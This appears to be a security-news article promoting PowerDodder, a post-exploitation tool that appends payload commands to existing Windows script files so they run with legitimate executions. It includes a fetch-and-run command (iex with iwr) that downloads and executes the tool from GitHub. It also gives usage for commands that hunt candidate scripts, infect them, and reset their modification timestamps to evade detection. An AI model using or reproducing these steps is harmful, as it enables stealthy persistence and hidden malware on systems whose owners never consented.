PowerDodder: The Stealthy New Tool That Hides Malware in Your Script Files
PowerDodder is a post-exploitation persistence utility designed to stealthily embed execution commands into existing script files on the host. By leveraging files that are frequently accessed but rarely modified, it targets high-likelihood execution vectors with minimal detection risk.
Background
Traditional persistence methods (e.g., Registry Run keys, scheduled tasks) are often monitored or flagged by EDRs and blue teams. PowerDodder takes a novel approach:
- It hunts for existing script files on disk (
.ps1,.bat,.cmd,.vbs,.js). - It prioritizes those that:
- Have been accessed recently (indicating they’re being executed often).
- Haven’t been modified recently (suggesting they’re not actively edited).
- It lets you choose the target script(s), and then it appends a payload-spawning command using a context-appropriate syntax (PowerShell, VBScript, JScript, etc.).
This allows for low-noise persistence, hitching a ride on legitimate execution paths.
Name Origin
The name Dodder comes from a parasitic vine that attaches itself to host plants, slowly feeding off them without killing them — much like this tool latches onto host scripts for persistent execution.
[pastacode lang=”bash” manual=”iex%20(iwr%20https%3A%2F%2Fraw.githubusercontent.com%2Fitaymigdal%2FPowerDodder%2Frefs%2Fheads%2Fmain%2FPowerDodder.ps1)” message=”” highlight=”” provider=”manual”/]
Scans predefined folders (C:\Users\, C:\Program Files\, C:\Program Files (x86)\, C:\ProgramData\) for promising script files.
[pastacode lang=”bash” manual=”DodderHunt” message=”” highlight=”” provider=”manual”/]
You can also target a specific folder:
[pastacode lang=”bash” manual=”DodderHunt%20-FolderPath%20%22C%3A%5CCustomPath%22″ message=”” highlight=”” provider=”manual”/]
Optional params:
-LastAccessTimeThreshold: default is 7 days.
-LastModifyTimeThreshold: default is 3 months.
You can set different thresholds like that:
[pastacode lang=”bash” manual=”%24DifferentModifyThreshold%20%3D%20(get-date).AddMonths(-4)%20%24DifferentAccessThreshold%20%3D%20(get-date).AddDays(-20)%20DodderHunt%20-LastAccessTimeThreshold%20%24DifferentAccessThreshold%20-LastModifyTimeThreshold%20%24DifferentModifyThreshold” message=”” highlight=”” provider=”manual”/]
[pastacode lang=”bash” manual=”DodderInfect%20-ID%20%3CCandidateID%3E%20-PersistCommand%20%3CExecutionCommand%3E” message=”” highlight=”” provider=”manual”/]
This will:
- Create the appended line of your command based on the relevant template.
- Modify the file by appending the persistence command.
- Restore the original script LastWriteTime attribute to hide the modification.
- Move the infected script to the Infected list.
DodderShow: Lists found candidates and already-infected files.DodderClearCandidates: Empties the current candidates list (useful before rescanning).
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
